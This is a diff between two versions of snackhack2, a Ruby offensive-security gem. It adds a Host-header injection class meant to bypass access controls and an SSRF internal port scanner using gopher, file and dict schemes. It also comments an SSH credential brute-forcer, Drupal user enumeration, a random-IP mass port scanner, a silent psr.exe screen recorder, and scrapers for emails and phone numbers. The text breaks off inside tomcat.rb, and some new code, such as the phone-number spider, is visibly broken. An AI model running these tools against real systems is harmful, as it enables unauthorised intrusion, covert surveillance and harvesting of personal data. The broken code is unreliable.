snackhack2 0.6.8 → 0.6.9

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 0ebd87b5313f0ca67abbb146beb1990b448c4dbe073afbb46122440d35849063
-  data.tar.gz: 9ae6115bbe6a97494dab6dfd02acf854abcd4c9acd6b605b3de35103497fd767
+  metadata.gz: 23625b0c0b96d9310abb4adcfe327cbf41bfcd0b30a605b420fdaf39b56587c7
+  data.tar.gz: 748b136fb5ec56893c91d2a5e911a642d7f52aebc4b1dd4a3a4372644c107fc6
 SHA512:
-  metadata.gz: ae1dcbd9a7f7f43f74d37ca079ea24c0693eabd5b8bd0bf5467801341bb50dff9e7fc28a70a4795d45af2d5c3c847578560a7ee86f199edc26d7c35bef50deba
-  data.tar.gz: a5a50dd46b6b9870caba17892f620f42212ecada0cb430700184c004b8da2e39d50dbd760049e0a742636495cae3d261c5669e04faf5134913111b489956d428
+  metadata.gz: 1c5d3a5223ea6b1522b0448d9b1e6e01aa3ef1eece72c81888b3b317792533ddeb3c9ebfe517b6069a096b9f21250ef3b93d00c914602a1d5018fd1d7d012f1b
+  data.tar.gz: 189d3057f610d1a52b51f7e4745082814ab637fb985cc53f93cef48aa654b12c5fc0775309b5c3625d709228c021e43e0918808a5585390b18d81d93f81cbd52

data/lib/snackhack2/SSL.rb

@@ -2,12 +2,14 @@ require 'net/http'
 require 'openssl'
 module Snackhack2
 	class SSLCert
-		attr_accessor :site
+		attr_accessor :site, :file_save
 
 	    def initialize
 	    	@site = site
+	    	@file_save = false
 	    end
-		def get_cert
+		def get_cert(print_status: false)
+			save_txt_file = ''
 			begin
 				if @site.downcase.include?("https://")
 					@site = @site.downcase.gsub("https://", "")
@@ -15,9 +17,18 @@ module Snackhack2
 				uri = URI::HTTPS.build(host: @site)
 				response = Net::HTTP.start(uri.host, uri.port, :use_ssl => true)
 				cert = response.peer_cert
-				puts cert.serial
+				if @file_save
+					save_txt_file += cert.serial
+				else 
+					if print_status
+						puts cert.serial
+					else
+						return cert.serial
+					end
+				end
 			rescue OpenSSL::SSL::SSLError,Net::OpenTimeout, Errno::EHOSTUNREACH
 			end
+		Snackhack2.file_save(@site, 'ssl', save_txt_file) if @file_save
 		end
 	end
 end

data/lib/snackhack2/bannergrabber.rb

@@ -13,23 +13,29 @@ module Snackhack2
     def run
       nginx
       apache2
+      cloudflare
       wordpress
-      get_ssh_info
+      cloudfront
     end
     def headers
       @headers = Snackhack2.get(@site).headers
     end
     def nginx
-      puts "[+] Server is running NGINX... Now checking if #{File.join(@site, 'nginx_status')} is valid..."
-      nginx = Snackhack2.get(File.join(@site, 'nginx_status'))
-      if nginx.code == 200
-        puts "Check #{@site}/nginx_status"
-      else
-        puts "Response code: #{nginx.code}"
+      if headers['server'].include?("nginx")
+        puts "[+] Server is running NGINX... Now checking if #{File.join(@site, 'nginx_status')} is valid..."
+        nginx = Snackhack2.get(File.join(@site, 'nginx_status'))
+        if nginx.code == 200
+          puts "Check #{@site}/nginx_status"
+        else
+          puts "Response code: #{nginx.code}... nginx_status not giving 200"
+        end
+      else 
+        puts "[+] No nginx detected..."
       end
     end
 
     def curl
+      # uses cURL to head a website header
       servers = ''
       # rus the curl command to get the headers of the given site. 
       cmd = `curl -s -I #{@site.gsub('https://', '')}`
@@ -55,16 +61,20 @@ module Snackhack2
         else
           puts "[+] Response Code: #{apache.code}...\n\n"
         end
-      else
-        puts "Apache2 is not found...\n\n"
       end
     end
 
     def wordpress
+      wp_status = false
+      wp_types = ["Yoast SEO plugin", "wp-content", "wp-json"]
       wp = Snackhack2.get(@site).body
-      return unless wp.match(/wp-content/)
+      # return unless wp.match(/wp-content/)
+      wp_types.each do |wp|
+        p wp.match(/#{wp}/)
+      end
+      #puts "[+] Wordpress '/wp-content' found [+]\n\n\n" if wp.match(/wp-content/)
 
-      puts "[+] Wordpress found [+]\n\n\n"
+      
     end
     def types
       {
@@ -116,6 +126,37 @@ module Snackhack2
         end
       end
     end
+    def cloudfront(print_status: true)
+      # the purpose of this method is to 
+      # check to see if a site has 
+      # cloudflare in the headers
+
+      cf_status = false
+      cf_count  = 0
+
+      # access the 'types' hash to get the cloudflare strings. 
+      cf = types[:"aws CloudFront"]
+
+      # make a single get request to the site defined at '@site'
+      find_headers.each do |k,v|
+        # if the key is in the array cf
+        if cf.include?(k)
+          cf_status = true
+          cf_count += 1
+        end
+      end
+      unless print_status
+        # cf_status[0] : the status if cloudfront was found
+        # cf_count[1]  : the number of found elements in the 'cloudfront' hash. 
+        return [cf_status, cf_count]
+      else
+        if cf_status
+          puts "Cloudfront was found. The count is: #{cf_count}"
+        else
+          puts "Cloudfront was NOT found. The count is #{cf_count}"
+        end
+      end
+    end
     def detect_header(return_status: true)
       # stores the data found in 
       # the headers.

data/lib/snackhack2/comments.rb

@@ -12,13 +12,15 @@ module Snackhack2
       c = Snackhack2.get(@site)
 
       if c.code == 200
+        # turns the body of the text into an array
         body = c.body.split("\n")
         body.each_with_index do |l, i|
           line = l.strip
+          # detects if html code is present
           if line.start_with?('<!--')
-            puts body[i].next
+            puts body[i].next.strip
           elsif line.include?('<!')
-            puts body[i].next
+            puts body[i].next.strip
           end
         end
       else

data/lib/snackhack2/dns.rb

@@ -5,8 +5,9 @@ module Snackhack2
   class Dns
     attr_accessor :site
 
-    def initialize()
+    def initialize
       @site = site
+     
     end
 
     def all_dns

data/lib/snackhack2/drupal.rb

@@ -26,14 +26,17 @@ module Snackhack2
       end
       
       doc = Nokogiri::HTML(URI.open(@site))
+      # uses xpath to extra the data stored in the meta tags
       posts = doc.xpath('//meta')
       posts.each do |l|
+        # display the drupal version and other info
         puts "\n\n[+] Drupal Version: #{l.attributes['content']}\n" if l.attributes['content'].to_s.include?('Drupal')
       end
       puts "\nDrupal Score: #{drupal_score}\n"
     end
 
     def user_brute
+      # enumerate the users by looping 0 to 1000
       (1..1000).each do |user|
         u = Snackhack2.get(File.join(@site, 'user', user.to_s)).body
         if u.include?('Page not found')

data/lib/snackhack2/emails.rb

@@ -19,8 +19,11 @@ module Snackhack2
       Spidr.start_at(@site, max_depth: @max_depth) do |agent|
         agent.every_page do |page|
           body = page.to_s
+          # uses a regex to look for email addresses
           if body.scan(/[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}/)
+            # again, uses regex to extract the email addresses and removes duplicates
             email = body.scan(/[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}/).uniq
+            # if emails not found already in the array, it will add the email to the array. 
             found_emails << email if !email.include?(found_emails) && !email.empty?
           end
         end

data/lib/snackhack2/forward_remote.rb

@@ -4,7 +4,7 @@ require 'net/ssh'
 module Snackhack2
   class SSHForwardRemote
     attr_accessor :site, :user, :pass, :key, :lport, :lsite, :rport
-
+    # forwards ssh traffic 
     def initialize
       @site = site
       @user = user

data/lib/snackhack2/google_analytics.rb

@@ -5,26 +5,38 @@ module Snackhack2
   class GoogleAnalytics
     attr_accessor :site
 
-    def initialize
+    def initialize(print_status: false)
       @site = site
     end
 
     def run
+      # uses a handful of different regexs to extract the Google Analytics
+      # code from sites. This is used by the site admin to track and mesaure 
+      # people who visit the site. This could be used to find more sites 
+      # they own where they re-use the code.
+      gas = []
       a = Snackhack2.get(@site).body
       case a
       when /UA-\d{8}-\d/
-        puts a.match(/UA-\d{8}-\d/)
+        gas << a.match(/UA-\d{8}-\d/).to_s
       when /GTM-[A-Z0-9]{7}/
-        puts a.match(/GTM-[A-Z0-9]{7}/)
+        gas <<  a.match(/GTM-[A-Z0-9]{7}/).to_s
       when /G-([0-9]+([A-Za-z]+[0-9]+)+)/
-        puts a.match(/G-([0-9]+([A-Za-z]+[0-9]+)+)/)
+        gas << a.match(/G-([0-9]+([A-Za-z]+[0-9]+)+)/).to_s
       when /G-[A-Za-z0-9]+/
-        puts a.match(/G-[A-Za-z0-9]+/)
+        gas << a.match(/G-[A-Za-z0-9]+/).to_s
       when /GT-[A-Za-z0-9]+/
-        puts a.match(/GT-[A-Za-z0-9]+/)
+        gas << a.match(/GT-[A-Za-z0-9]+/).to_s
       else
         puts '[+] No Google Analytics found :('
       end
+      if @print_status
+        gas.each do |g|
+          puts g
+        end
+      else 
+        return gas
+      end
     end
   end
 end

data/lib/snackhack2/host_injection.rb

@@ -0,0 +1,93 @@
+# frozen_string_literal: true
+
+# Process.spawn("ruby -run -ehttpd . -p8008")
+# sleep 10
+module Snackhack2
+  class HostInjection
+    attr_accessor :site, :new_host_ip, :old_host_ip
+    # old_host_ip: the IP of the host (public IP) that its supposed to be
+    # new_host_ip: the IP of the host to bypass access controls
+    def initialize
+      @site = site
+    end
+    def test_all
+      p @new_host_ip
+      p @old_host_ip
+      [ "Host", "\sHost", "\rHost", "X-Forwarded-Host", "\sX-Forwarded-Host",
+        "X-Host", "\sX-Host", "\rX-Host", "X-Remote-Addr", "\sX-Remote-Addr",
+        "\rX-Remote-Addr", "X-Remote-IP", "\sX-Remote-IP", "\rX-Remote-IP",
+        "X-Forwarded-Server", "\sX-Forwarded-Server", "\rX-Forwarded-Server",
+        "Forwarded", "\sForwarded", "\rForwarded", "\sX-HTTP-Host-Override",
+        "X-HTTP-Host-Override", "\rX-HTTP-Host-Override"].each do |h|
+          head = {"Host" => @old_host_ip}
+          head[h] = @new_host_ip
+          r = HTTParty.get(@site, headers: head)
+          puts r.code
+          puts "\n==========================\n"
+      end
+    end
+
+    def host_ip
+      unless @old_host_ip.nil?
+        response = HTTParty.get(@site, headers: { "Host" => @old_host_ip})
+        puts response.body
+        puts response.code
+      end
+    end
+    def double_host_ip
+      unless @old_host_ip.nil?
+        response = HTTParty.get(@site, headers: { "Host" => @old_host_ip, "Host" => @new_host_ip})
+        puts response.body
+        puts response.code
+      end
+    end
+    def x_forwarded
+      unless @old_host_ip.nil?
+        response = HTTParty.get(@site, headers: { "Host" => @old_host_ip, "X-Forwarded-Host" => @new_host_ip})
+        puts response.body
+        puts response.code
+      end
+    end
+    def double_x_forwarded
+      unless @old_host_ip.nil?
+        response = HTTParty.get(@site, headers: { "X-Forwarded-Host" => @old_host_ip, "X-Forwarded-Host" => @new_host_ip})
+        puts response.body
+        puts response.code
+      end
+    end
+    def x_forwarded_server
+      unless @old_host_ip.nil?
+        r = HTTParty.get(@site, headers: {"Host" => @old_host_ip, "X-Forwarded-Server" => @new_host_ip})
+        puts r.body
+        puts r.code
+        r = HTTParty.get(@site, headers: {"X-Forwarded-Server" => @old_host_ip, "X-Forwarded-Server" => @new_host_ip})
+        puts r.body
+        puts r.code
+      end
+    end
+    def http_host_override
+      unless @old_host_ip.nil?
+        r = HTTParty.get(@site, headers: {"Host" => @old_host_ip, "X-HTTP-Host-Override" => @new_host_ip})
+        puts r.body
+        puts r.code
+        r = HTTParty.get(@site, headers: {"X-HTTP-Host-Override" => @old_host_ip, "X-HTTP-Host-Override" => @new_host_ip}).body
+      end
+    end
+    def extra_return_host
+      unless @new_host_ip.nil?
+        response = HTTParty.get(@site, headers: {"\rHost" => "#{@new_host_ip}"}, "Host" => "#{old_host_ip}").body
+        puts response
+      end
+    end
+    def extra_space_host
+      unless @new_host_ip.nil?
+        response = HTTParty.get(@site, headers: {"\sHost" => "#{@new_host_ip}"}, "Host" => "#{old_host_ip}").body
+        puts response
+      end
+    end
+  end
+end
+
+
+
+

data/lib/snackhack2/iplookup.rb

@@ -2,51 +2,58 @@
 
 require 'socket'
 require 'colorize'
+
 module Snackhack2
   class IpLookup
     attr_accessor :site
 
     def initialize(file_save: false)
       @file_save = file_save
-      @site = site
+      # Clean the URL immediately to avoid repeating .gsub everywhere
+    end
+
+    def site
+      @site = @site.gsub(%r{https?://}, '').split('/').first
     end
 
     def run
-      get_ip
-      nslookup
-      socket
+      # Running all methods and displaying results
+      puts "Methods for: #{@site}".bold.blue
+      puts "Ping:   #{get_ip.join(', ')}"
+      puts "NS:     #{nslookup.is_a?(Array) ? nslookup.join(', ') : 'Saved to file'}"
+      puts "Socket: #{socket_lookup}"
     end
 
     def get_ip
+      # Uses ping command to get IP of the host
       ips = []
-      ip = `ping -c 2 #{@site.gsub('https://', '')}`.lines
-      ip.each do |l|
-        new_ip = l.match(/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/)
-        ips << new_ip.to_s if !new_ip.to_s.empty? && !ips.include?(new_ip)
+      output = `ping -c 2 #{@site}`
+      # Using scan to find all IP-like patterns
+      output.scan(/(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/).each do |match|
+        ip = match.first
+        ips << ip unless ips.include?(ip)
       end
       ips
     end
 
     def nslookup
-      ips = []
-      ns = `nslookup #{@site.gsub('https://', '')}`.lines
-      ns.each do |ip|
-        new_ip = ip.gsub('Address: ', '').strip if ip.include?('Address')
-        if !ips.include?(new_ip) && !new_ip.nil?
-          
-          ips << new_ip.split('Addresses:  ')[1].to_s
-        end
-      end
+      # Uses the nslookup command to extract the IP
+      output = `nslookup #{@site}`
+      # Simplified extraction using regex for "Address: [IP]"
+      ips = output.scan(/Address: (\d{1,3}(?:\.\d{1,3}){3})/).flatten.uniq
 
       if @file_save
-        Snackhack2.file_save(@site, 'ip_lookup', ips.to_a.drop(1).join("\n"))
+        # Note: Ensure Snackhack2.file_save is defined in your main module
+        Snackhack2.file_save(@site, 'ip_lookup', ips.join("\n"))
       else
         ips
       end
     end
 
-    def socket
-      puts IPSocket.getaddress(@site.gsub('https://', ''))
+    def socket_lookup
+      IPSocket.getaddress(@site)
+    rescue SocketError
+      "Could not resolve"
     end
   end
-end
+end

data/lib/snackhack2/list_users.rb

@@ -9,6 +9,8 @@ module Snackhack2
     end
 
     def linux
+      # uses the cat file to read the users in /etc/passwd
+      # then displays all the users
       `cat /etc/passwd`.split("\n").each do |l|
         puts l.split(':')[0]
       end

data/lib/snackhack2/phone_number.rb

@@ -7,47 +7,88 @@ module Snackhack2
     attr_accessor :save_file, :site
 
     def initialize(save_file: true)
-      @site = site
+      @site = site 
       @save_file = save_file
     end
 
     attr_reader :save_file
 
     def run
-      numbers = []
-      http = Snackhack2.get(@site)
-      if http.code == 200
-        regex = http.body
-        phone = regex.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)
-        out = phone.map { |n| n[0] }.compact
-        numbers << out
+      found_numbers = []
+      unless @site.include?("https://")
+        @site = "https://#{@site}"
       else
-        puts "\n\n[+] Status code: #{http.code}"
+        @site = site
       end
-      return if numbers.empty?
-      return unless @save_file
-
-      URI.parse(@site).host
-      Snackhack2.file_save(@site, 'phone_numbers', numbers.join("\n"))
+      http = Snackhack2.get(@site).body
+      case http
+      when (/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)
+        ph_1 = http.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/).flatten
+        found_numbers <<  ph_1 
+      when /^(\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4}$/
+        ph_2 = http.scan(/^(\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4}$/).flatten
+        found_numbers << ph_2 
+      when (/^[\+]?[(]?[0-9]{3}[)]?[-\s\.]?[0-9]{3}[-\s\.]?[0-9]{4,6}$/)
+        ph_3 = http.scan(/^[\+]?[(]?[0-9]{3}[)]?[-\s\.]?[0-9]{3}[-\s\.]?[0-9]{4,6}$/).flatten
+        found_numbers << ph_3 
+      when (/^\+((?:9[679]|8[035789]|6[789]|5[90]|42|3[578]|2[1-689])|9[0-58]|8[1246]|6[0-6]|5[1-8]|4[013-9]|3[0-469]|2[70]|7|1)(?:\W*\d){0,13}\d$/).flatten
+        ph_4 = http.scan((/^\+((?:9[679]|8[035789]|6[789]|5[90]|42|3[578]|2[1-689])|9[0-58]|8[1246]|6[0-6]|5[1-8]|4[013-9]|3[0-469]|2[70]|7|1)(?:\W*\d){0,13}\d$/))
+        found_numbers << ph_4 
+      when (/^(\+0?1\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4}$/)
+        ph_5 = http.scan(/^(\+0?1\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4}$/)
+        found_numbers << ph_5
+      when (/^\+?[1-9][0-9]{7,14}$/)
+        ph_6 = http.scan(/^\+?[1-9][0-9]{7,14}$/)
+        found_numbers << ph_6
+      when (/^\+?\d{1,4}?[-.\s]?\(?\d{1,3}?\)?[-.\s]?\d{1,4}[-.\s]?\d{1,4}[-.\s]?\d{1,9}$/)
+        ph_7 = http.scan(/^\+?\d{1,4}?[-.\s]?\(?\d{1,3}?\)?[-.\s]?\d{1,4}[-.\s]?\d{1,4}[-.\s]?\d{1,9}$/)
+        found_numbers << ph_7
+      end
+      numbers = found_numbers.flatten.compact
+      if @save_file
+        Snackhack2.file_save(@site, 'phone_numbers', numbers.join("\n"))
+      else
+        return numbers
+      end 
     end
-
     def spider
-      phone_numbers = []
+      found_numbers = []
       Spidr.start_at(@site, max_depth: 4) do |agent|
         agent.every_page do |page|
           body = page.to_s
-          if body.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)
-            pn = body.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)[0]
-            unless pn.nil?
-              pn = pn.compact.reject { |i| i.to_s.nil? }.shift
-              phone_numbers << pn unless phone_numbers.include?(pn.to_s)
-            end
+          # regex to extract phone numbers
+          case body
+          when (/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)
+            ph_1 = http.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/).flatten
+            found_numbers <<  ph_1 
+          when /^(\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4}$/
+            ph_2 = http.scan(/^(\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4}$/).flatten
+            found_numbers << ph_2 
+          when (/^[\+]?[(]?[0-9]{3}[)]?[-\s\.]?[0-9]{3}[-\s\.]?[0-9]{4,6}$/)
+            ph_3 = http.scan(/^[\+]?[(]?[0-9]{3}[)]?[-\s\.]?[0-9]{3}[-\s\.]?[0-9]{4,6}$/).flatten
+            found_numbers << ph_3 
+          when (/^\+((?:9[679]|8[035789]|6[789]|5[90]|42|3[578]|2[1-689])|9[0-58]|8[1246]|6[0-6]|5[1-8]|4[013-9]|3[0-469]|2[70]|7|1)(?:\W*\d){0,13}\d$/).flatten
+            ph_4 = http.scan((/^\+((?:9[679]|8[035789]|6[789]|5[90]|42|3[578]|2[1-689])|9[0-58]|8[1246]|6[0-6]|5[1-8]|4[013-9]|3[0-469]|2[70]|7|1)(?:\W*\d){0,13}\d$/))
+            found_numbers << ph_4 
+          when (/^(\+0?1\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4}$/)
+            ph_5 = http.scan(/^(\+0?1\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4}$/)
+            found_numbers << ph_5
+          when (/^\+?[1-9][0-9]{7,14}$/)
+            ph_6 = http.scan(/^\+?[1-9][0-9]{7,14}$/)
+            found_numbers << ph_6
+          when (/^\+?\d{1,4}?[-.\s]?\(?\d{1,3}?\)?[-.\s]?\d{1,4}[-.\s]?\d{1,4}[-.\s]?\d{1,9}$/)
+            ph_7 = http.scan(/^\+?\d{1,4}?[-.\s]?\(?\d{1,3}?\)?[-.\s]?\d{1,4}[-.\s]?\d{1,4}[-.\s]?\d{1,9}$/)
+            found_numbers << ph_7
           end
         end
       end
-      return if phone_numbers.empty?
-
-      Snackhack2.file_save(@site, 'phonenumbers', phone_numbers.join("\n")) if @save_file
+      unless phone_numbers.empty?
+        if @save_file
+          Snackhack2.file_save(@site, 'phonenumbers', phone_numbers.join("\n"))
+        else
+          return phone_numbers
+        end
+      end
     end
   end
 end

data/lib/snackhack2/portscan.rb

@@ -13,13 +13,17 @@ module Snackhack2
     end
 
     def run
+      # runs `tcp` with threads
       threads = []
+      # creates all the ports between 1 and 1000
       ports = [*1..1000]
       ports.each { |i| threads << Thread.new { tcp(i) } }
       threads.each(&:join)
     end
 
     def mass_scan
+      # uses the `generate_ips` to generate radom 
+      # IPs. then performs the scan
       generate_ips.each do |ips|
         tcp = PortScan.new
         tcp.ip = ips
@@ -28,6 +32,8 @@ module Snackhack2
     end
 
     def generate_ips
+      # generate a bunch of different Ips to an
+      # array named `ips`.
       ips = []
       @count.to_i.times do |_c|
         ips << Array.new(4) { rand(256) }.join('.')
@@ -36,6 +42,10 @@ module Snackhack2
     end
 
     def ports_extractor(port)
+      # Looks through the files in the folder that 
+      # match '_port_scan.txt' which extracts the 
+      # ports
+
       ip = []
       files = Dir['*_port_scan.txt']
       files.each do |f|
@@ -62,7 +72,7 @@ module Snackhack2
       return if open_ports.empty?
 
       return unless @display
-
+      # displays the open ports and IPs
       open_ports.each do |port|
         puts "#{ip} - #{port} is open\n"
       end

data/lib/snackhack2/robots.rb

@@ -2,13 +2,16 @@
 
 module Snackhack2
   class Robots
-    def initialize(site, save_file: true)
+    attr_accessor :port, :site, :save_file, :http
+    def initialize(site: "", save_file: true)
       @site = site
-      @http = Snackhack2.get(File.join(@site, 'robots.txt'))
-      @save_file = save_file
+
+    end
+    def site=(t)
+      @http = File.join(t, 'robots.txt')
     end
 
-    attr_reader :save_file
+    # attr_reader :save_file
 
     def run
       save_txt_file = ''
@@ -28,16 +31,27 @@ module Snackhack2
           end
         end
       else
-        puts allow
-        puts disallow
+        unless allow[1].empty?
+          puts "ALLOW: "
+          allow[1].each do |a|
+            puts a
+          end
+        end
+        unless disallow[1].empty?
+          puts "Disallow: "
+          disallow[1].each do |d|
+            puts d
+          end
+        end
       end
-      Snackhack2.file_save(@site, 'robots', save_txt_file) if @save_file
+    Snackhack2.file_save(@site, 'robots', save_txt_file) if @save_file
     end
 
     def allow_robots
       allow_dir = []
-      if @http.code == 200
-        body = @http.body.lines
+      http = Snackhack2.get(@http)
+      if http.code == 200
+        body = http.body.lines
         body.each do |l|
           allow_dir << l.split('Allow: ')[1] if l.match(/Allow:/)
         end
@@ -46,21 +60,25 @@ module Snackhack2
       end
       open_links = []
       allow_dir.each do |path|
-        link = Snackhack2.get(File.join(@site, path.strip))
+        link = Snackhack2.get(@http)
         if link.code == 200
           valid_links = "#{@site}#{path}"
           open_links << valid_links
         end
       end
-      open_links
+      [ open_links, allow_dir]
     end
 
     def disallow_robots
+      http = Snackhack2.get(@http)
       disallow_dir = []
-      if @http.code == 200
-        body = @http.body.lines
+      if http.code == 200
+        body = http.body.lines
         body.each do |l|
-          disallow_dir << l.split('Disallow: ')[1] if l.match(/Disallow:/)
+          if l.match(/Disallow:/)
+
+            disallow_dir << l.split('Disallow: ')[1]
+          end 
         end
       else
         puts "[+] Not giving code 200.\n"
@@ -74,7 +92,7 @@ module Snackhack2
         end
       rescue StandardError
       end
-      open_links
+      [ open_links, disallow_dir]
     end
   end
 end

data/lib/snackhack2/ruby_comments.rb

@@ -0,0 +1,46 @@
+module Snackhack2
+	class RubyComments
+		attr_accessor :file
+		def initialize
+			@file = file
+		end
+		def comment_block
+			if File.exist?(@file)
+			  comments = []
+			  in_comment_block = false
+			  File.readlines(@file).each do |file|
+			    file.each_line do |line|
+			      if line.strip.eql? '=begin'
+			        in_comment_block = true
+			        next
+			      elsif line.strip.eql? '=end'
+			        in_comment_block = false
+			        next
+			      end
+
+			      if in_comment_block
+			        comments << line
+			      end
+			    end
+			  end
+			  comments.each do |c|
+			  	puts c
+			  end
+			else
+				puts "#{@file} does not exist."
+			end
+		end
+		def comments
+			if File.exist?(@file)
+				File.readlines(@file).each do |l|
+					line = l.to_s
+					if line.to_s.start_with?("#")
+						puts l
+					end
+				end
+			else 
+				puts "#{@file} does not exist."
+			end
+		end
+	end
+end

data/lib/snackhack2/screenshots.rb

@@ -12,12 +12,19 @@ module Snackhack2
     end
 
     def run
+      # creates a `.bat` filw with a command that will start the screen recordings
       File.open('lol.bat', 'w+') { |file| file.write("psr.exe /start /output #{@zip} /sc 1 /gui 0") }
+      # this will save a .bat file that will stop the recording
       File.open('lol2.bat', 'w+') { |file| file.write('psr.exe /stop') }
+      # run `lol.bat`
       Process.spawn('lol.bat')
+      # sleeps for the amount of time declared in instance variable `@time` which by 
+      # defualt is 60 seconds 
       sleep @time.to_i
+      # runs lol2.bat
       system('lol2.bat')
       sleep 2
+      # deletes both `lol.bat` and `lol2.bat`.
       File.delete('lol.bat')
       File.delete('lol2.bat')
     end

data/lib/snackhack2/sitemap.rb

@@ -4,14 +4,22 @@ require 'httparty'
 require 'nokogiri'
 module Snackhack2
   class SiteMap
-    def initialize(site)
+    attr_accessor :site
+    def initialize
       @site = site
     end
 
     def run
+      # adds `sitemap.xml` to the site given 
+      # defined in `@site` instance variable.
       sm = Snackhack2.get(File.join(@site, 'sitemap.xml'))
-      if sm.code == 200
-        if !sm.body.include?('Not Found')
+      # site returns 200 status code
+      if sm.code.to_i.eql?(200)
+        # checks the body of the page to detetmine if the words
+        # `Not Found` is it
+        unless sm.body.include?('Not Found')
+          # the page did not include "Not Found". Saving the contents of the sitemap.xml 
+          # to a file.
           Snackhack2.file_save(@site, 'site.xml', sm.body)
         else
           puts "[+] Eh. I don't think the site has a sitemap. Manually check just in case... :(\n\n"

data/lib/snackhack2/sshbrute.rb

@@ -10,11 +10,14 @@ module Snackhack2
     end
 
     def list
+      # the list of usernames and password.
+      # username:password
       File.join(__dir__, 'lists', 'sshbrute.txt')
     end
 
     def run
       threads = []
+      # uses threads to make it faster
       File.readlines(list).each { |usr, pass| threads << Thread.new { brute(usr, pass) } }
       threads.each(&:join)
 
@@ -22,8 +25,11 @@ module Snackhack2
     end
 
     def brute(username, pass)
+      # does the bruting.
+      # saves the valid creds to the @success_list instance variable array
       Net::SSH.start(@ip, username, password: pass, timeout: 1) do |ssh|
         @success_list << [username, pass]
+        # runs the `hostame command if valid
         ssh.exec!('hostname')
       end
     rescue Net::SSH::AuthenticationFailed

data/lib/snackhack2/ssrf.rb

@@ -2,14 +2,61 @@
 
 # Process.spawn("ruby -run -ehttpd . -p8008")
 # sleep 10
+require 'typhoeus'
 module Snackhack2
   class SSRF
-    attr_accessor :site
-
+    attr_accessor :site, :ssrf_site, :protocol
     def initialize
       @site = site
+      @ssrf_site = ssrf_site
+      @protocol = protocol
+    end
+    def get_protocol
+      case @protocol.downcase
+      when "https"
+        "https://"
+      when "ftp"
+        "ftp://"
+      when "http"
+        "http://"
+      when "file"
+        "file://"
+      when "dict"
+        "dict://"
+      when "gopher"
+        "gopher://"
+      when "sftp"
+        "sftp://"
+      when "tftp"
+        "tftp://"
+      when "ldap"
+        "ldap://"
+      end
     end
-    def port_scan
+    def http_port_scan(port_count: 8082)
+      hydra = Typhoeus::Hydra.new
+      i = 0
+      # Where found ports will be saved.
+      found_ports = []
+      # tries 65530 ports
+      65530.times.each_with_index.map{ |i|
+        # adds the port to @ssrf
+        site = @site.gsub("SSRF", "#{@ssrf_site}") + ":" + i.to_s
+        request = Typhoeus::Request.new("#{site}", followlocation: true)
+        hydra.queue(request)
+        request.on_complete do |response|
+          # If the response code returns 200 it will save
+          # the port number to `found_ports`.
+          if response.code.to_i.eql?(200)
+            puts i
+            puts "#{response.code}"
+            found_ports << i
+          end
+        end
+      }
+      hydra.run
+    # returns the `found_ports` array.
+    found_ports
     end
     def ssrf_google
       url = @site.gsub('SSRF', 'http://google.com')

data/lib/snackhack2/subdomains.rb

@@ -5,16 +5,14 @@ require 'resolv'
 require 'async/http/internet'
 module Snackhack2
   class Subdomains
-    def initialize(site, wordlist: nil)
+    attr_accessor :site
+    def initialize(wordlist: nil)
       @site     = site
       @wordlist = wordlist
     end
 
-    def site
-      @site.gsub('https://', '')
-    end
-
     def wordlist
+      # gets the location of the subdomains list
       File.join(__dir__, 'lists', 'subdomains.txt')
     end
 
@@ -26,10 +24,15 @@ module Snackhack2
 
     def brute
       found = ''
+      # loops through each of the subdomains and adds it to
+      # the site which checks if it returns a `200` status code or `300` status code
+      unless @site.nil?
+        @site = @site.gsub("https://", "")
+      end
       File.readlines(wordlist).each do |l|
-        s = "#{l.strip}.#{site}"
+        s = "#{l.strip}.#{@site}"
+        p File.join('https://', s)
         begin
-          puts File.join('https://', s)
           g = Snackhack2.get(File.join('https://', s))
           if g.code == 200
             found += "#{s}\n"

data/lib/snackhack2/subdomains2.rb

@@ -3,7 +3,8 @@
 require 'async/http/internet'
 module Snackhack2
   class Subdomains2
-    def initialize(site)
+    attr_accessor :site
+    def initialize
       @site = site
       @urls = []
     end
@@ -18,7 +19,10 @@ module Snackhack2
 
     def run
       File.readlines(wordlist).each do |a|
+        # removes `https://` from the instance variable
+        # `@site`. Adds the subdomain from the file to test if it is valid
         url = "https://#{a.strip}.#{@site.gsub('https://', '')}"
+        
         fetch(url)
         puts url
       end
@@ -30,6 +34,8 @@ module Snackhack2
         task.with_timeout(2) do
           internet = Async::HTTP::Internet.new
           m = internet.get(url, { 'user-agent' => Snackhack2::UA })
+          # only adds it to the @url instance variable if
+          # it returns a status code of `200` OR `301`
           @urls << url if (m.status == 200) || (m.status == 301)
           m.read
         end

data/lib/snackhack2/tomcat.rb

@@ -3,20 +3,33 @@
 require 'nokogiri'
 module Snackhack2
   class TomCat
-    def initialize(site)
+    attr_accessor :site
+    def initialize
       @site = site
     end
 
     def run
-      tc = Snackhack2.get(File.join(@site, '/docs/'))
-      if tc.code == 404
-        if tc.body.include?('Tomcat')
-          doc = Nokogiri::HTML(tc.body)
-          version = doc.at('h3').text
